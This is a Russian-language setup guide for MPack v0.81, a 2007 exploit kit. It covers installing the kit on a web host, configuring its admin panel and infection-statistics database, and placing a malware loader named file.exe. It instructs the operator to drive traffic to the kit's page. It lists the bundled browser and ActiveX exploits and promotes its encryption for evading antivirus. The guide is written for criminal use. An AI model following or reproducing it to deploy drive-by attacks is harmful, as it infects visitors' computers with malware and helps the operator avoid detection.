Помощь по установке и настройке:
http://damagelab.org/index.php?showtopic=15297

 MPack v0.81
========================


Установка:

1) скопировать содержимое на хост
2) установить на папку права chmod(777)
3) отредактировать настройки связки в файле settings.php

  $AdminPath = "http://host.com/spk2"; //путь к папке с установленной админкой
  $Password = "mpack2"; //пароль для просмотра статистики
  $BlockDuplicates=1;  // 1 - блокировать повторные заходы

В данную версию включено большое количество уязвимостей на переполнение, поэтому настоятельно рекомендуется включать эту опцию. Пользователи идентифицируются по айпи адресу и заголовкам браузера что позволяет достичь максимальной точности.

Лоадер (или другой загружаемый файл) должен находиться в папке с установленной связкой с именем file.exe

3.1) Если будет использоваться MySQL для подсчета статистики по странам, настроить и его:

$UseMySQL = 0; // заменить на 1 если будет использоваться
$dbhost = "localhost"; //хост на котором расположен мускуль
$dbuser = "spluser"; 
$dbpass = "splpass";
$dbname = "spldb"; //имя базы данных
$dbstats = "stats";//имя таблицы в этой базе

ВНИМАНИЕ! Если будет использоваться MySQL, для корректной работы у пользователя должны быть права на создание и уничтожение таблиц внутри БД

3.2) создать необходимые для работы таблицы выполнением следующих запросов к примеру через интерфейс phpMyAdmin

для таблицы статистики (имя жестко фиксировано!)
 
CREATE TABLE `stats` (
`statid` VARCHAR( 50 ) NOT NULL ,
`a2` VARCHAR( 10 ) NOT NULL ,
`country` VARCHAR( 50 ) NOT NULL ,
`count` INT NOT NULL DEFAULT '0'
) ENGINE = MYISAM ;



4) проверить скрипт статистики, который будет находиться по адресу
http://myhost.com/spk2/stats.php?pass=mpack2
пароль задается в переменной $Password


5) если не сделано ранее, настроить лоадер и скопировать с именем file.exe в папку с настроенной связкой
ВАЖНО! Для подсчета пробива связки необходимо прописать скрипт счетчика в лоадер.
Для более точного пробива - первым в списке. Адрес счетчика таков:
http://myhost.com/spk2/fout.php 


6) гнать трафф на http://myhost.com/spk2/index.php и не забывать стучать за апдейтами

7) для очистки статистики вызвать скрипт http://myhost.com/spk2/flush.php


Включенные в связку сплоиты:
=================================
- модифицированный MS06-014 с максимизированной эффективностью
- MS06-006 под Firefox 1.5.x и Opera 7.x
- unnamed 0day для Win2000 (ms06-044)
= XML overflow под XP\2k3 с задержкой на срабатывание
= WebViewFolderIcon overflow
= WinZip ActiveX overflow
= QuickTime overflow
= ANI overflow



выход скрипта проходит двухступенчатую шифрацию с защитой от взлома и частично - детекта антивирусами. 100% гарантии чистоты выхода криптора дать нет возможности, однако внутрь криптованого экспа на сегодня очень трудно заглянуть не только любопытным, но и антивирусному софту =)

Dream Coders Team
icq 10299 
05.04.2007